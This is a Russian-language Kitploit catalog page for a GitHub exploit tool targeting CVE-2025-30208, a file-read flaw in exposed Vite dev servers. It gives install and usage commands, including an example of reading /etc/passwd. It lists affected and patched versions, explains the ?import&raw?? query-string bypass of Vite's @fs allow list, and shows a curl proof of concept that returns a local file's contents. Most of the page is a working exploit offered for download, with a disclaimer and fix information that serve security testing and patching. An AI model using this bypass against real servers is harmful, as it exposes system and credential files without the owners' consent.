Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-30208 — Этот эксплойт предназначен только для образовательных целей и этичного тестирования безопасности. Использование данного эксплойта против целей без предварительного взаимного согласия незаконно, и разработчик снимает с себя всякую ответственность за неправомерное использование или ущерб, причинённый этим эксплойтом. | Kitploit
Инструменты/GitHubGitHub/on1onss/cve-2025-30208
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubon1onss/cve-2025-30208

CVE-2025-30208

Репозиторий
47 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Этот эксплойт предназначен только для образовательных целей и этичного тестирования безопасности. Использование данного эксплойта против целей без предварительного взаимного согласия незаконно, и разработчик снимает с себя всякую ответственность за неправомерное использование или ущерб, причинённый этим эксплойтом.

Поделиться

CVE-2025-30208

[!IMPORTANT]

Отказ от ответственности

Данный эксплойт предназначен только для образовательных и этических целей тестирования безопасности. Использование этого эксплойта против целей без предварительного взаимного согласия незаконно, и разработчик снимает с себя любую ответственность за неправомерное использование или ущерб, причинённый этим эксплойтом.

Установка

root@kitploit:~
git clone https://github.com/On1onss/CVE-2025-30208.git
cd CVE-2025-30208
pip install -r requirements.txt

Использование

root@kitploit:~
python CVE-2025-30208.py [-h] [-t <Target URL>] [-fp <File Path>] [-i]

Опции:
  -h, --help       показать это справочное сообщение и выйти
  -t <Target URL>  Пример: -t http://localhost:5173/
  -fp <File Path>  Пример: -fp /etc/passwd
  -i               Интерактивный режим

Описание

Затронутые версии

root@kitploit:~
>= 6.2.0, < 6.2.3
>= 6.1.0, < 6.1.2
>= 6.0.0, < 6.0.12
>= 5.0.0, < 5.4.15
< 4.5.10

Исправленные версии

root@kitploit:~
6.2.3
6.1.2
6.0.12
5.4.15
4.5.10

Краткое описание

Содержимое произвольных файлов может быть возвращено браузеру.

Воздействие

Затронуты только приложения, явно открывающие dev-сервер Vite в сеть (с помощью опций --host или server.host в конфигурации).

Подробности

@fs запрещает доступ к файлам за пределами разрешённого списка Vite. Добавление ?raw?? или ?import&raw?? в URL обходит это ограничение и возвращает содержимое файла, если он существует. Этот обход существует потому, что конечные разделители, такие как ?, удаляются в нескольких местах, но не учитываются в регулярных выражениях для строк запроса.

PoC

root@kitploit:~
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# ожидаемое поведение
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# обход защиты
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
# sourceMappingURL=data:application/json;base64,eyJ2...

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  • https://github.com/advisories/GHSA-x574-m823-4x7w
  • vitejs/vite@315695e
  • vitejs/vite@80381c3
  • vitejs/vite@807d7f0
  • vitejs/vite@92ca12d
  • vitejs/vite@f234b57
Скачать инструмент